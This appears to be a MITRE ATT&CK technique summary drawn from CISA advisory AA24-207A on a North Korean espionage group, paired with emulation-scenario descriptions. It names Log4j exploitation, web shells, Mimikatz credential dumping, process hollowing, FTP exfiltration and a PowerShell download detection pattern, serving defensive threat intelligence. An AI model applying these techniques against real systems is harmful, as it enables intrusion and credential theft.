CISA Advisory AA24-207A: North Korean Cyber Group Engages in Global Espionage to Support Military and Nuclear Advancements

MITRE Techniques

• [T1190] Exploit Public-Facing Application – Exploitation of web servers with known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. “…exploitation of web servers with known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation…”
• [T1566.001] Phishing: Attachment – Phishing activity using malicious attachments, including Microsoft Windows Shortcut Files (LNK) or HTML Application (HTA) script files inside encrypted or unencrypted zip archives. “…phishing activity using malicious attachments, including Microsoft Windows Shortcut Files (LNK) or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.”
• [T1053.005] Scheduled Task – Scheduled Task/Job: This scenario acquires persistence through the creation of a new scheduled task using the schtasks utility. “…Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task using the schtasks utility.”
• [T1003] OS Credential Dumping – This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts. “…OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.”
• [T1082] System Information Discovery – The native systeminfo command is executed to retrieve all of the Windows system information. “…System Information Discovery (T1082): The native systeminfo command is executed to retrieve all of the Windows system information.”
• [T1083] File and Directory Discovery – This scenario executes the dir command to discover files and directories. “…File and Directory Discovery (T1083): This scenario executes the dir command to discover files and directories.”
• [T1087] Account Discovery – This scenario uses the native net user command to obtain a list of additional accounts known to the infected host. “…Account Discovery (T1087): This scenario uses the native net user command to obtain a list of additional accounts known to the infected host.”
• [T1049] System Network Connections Discovery – Using netstat the actors are able to get a list of remote connections established to and from the infected asset. “…System Network Connections Discovery (T1049): Using netstat the actors are able to get a list of remote connections established to and from the infected asset.”
• [T1087.002] Account Discovery: Domain Account – This scenario uses the Adfind utility to discover details about the victim’s Active Directory configuration including accounts, groups, computers, and subnets. “…Account Discovery: Domain Account (T1087.002): This scenario uses the Adfind utility to discover details about the victim’s Active Directory configuration including accounts, groups, computers, and subnets.”
• [T1021.001] Remote Services: Remote Desktop Protocol – This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP) protocol. “…Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP) protocol.”
• [T1105] Ingress Tool Transfer – This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads. “…Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.”
• [T1048] Exfiltration Over Alternative Protocol – This scenario will start an FTP connection against an AttackIQ server to emulate the exfiltration of sensitive information from the compromised system. “…Exfiltration Over Alternative Protocol (T1048): This scenario will start an FTP connection against an AttackIQ server to emulate the exfiltration of sensitive information from the compromised system.”
• [T1057] Process Discovery – Process Discovery Through Tasklist: This scenario uses the Window’s built-in tasklist command to discover running processes, and the results are saved to a file in a temporary location. “…Process Discovery Through Tasklist: This scenario uses the Window’s built-in tasklist command to discover running processes, and the results are saved to a file in a temporary location.”
• [T1059.001] PowerShell – PowerShell Example: This shows PowerShell activity such as using IWR/Invoke-WebRequest to download data. “…PowerShell Example: … (IWR” OR “Invoke-WebRequest”)…”
• [T1055] Process Injection – Process Hollowing: This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable. “Process Hollowing: This scenario creates a process in a suspended state and unmap its memory, which is then replaced with the contents of a malicious executable.”
• [T1134] Access Token Manipulation – This scenario lists active access tokens that could be impersonated by another process. “…Access Token Manipulation: This scenario lists active access tokens that could be impersonated by another process.”
• [T1021.004] SSH – Lateral Movement Through SSH: This scenario attempts to open a remote shell and execute commands on target computers using SSH. “…Lateral Movement Through SSH: This scenario attempts to open a remote shell and execute commands on target computers using SSH.”
• [T1007] System Service Discovery – System Service Discovery Script: This scenario executes Microsoft’s native sc utility to query a list of all running services. “…System Service Discovery Script: This scenario executes Microsoft’s native sc utility to query a list of all running services.”
• [T1057] Process Discovery – Process Discovery Through Tasklist (duplicate in list) – This scenario uses the Tasklist utility to discover processes. “…Process Discovery Through Tasklist: This scenario uses the Window’s built-in tasklist command to discover running processes…”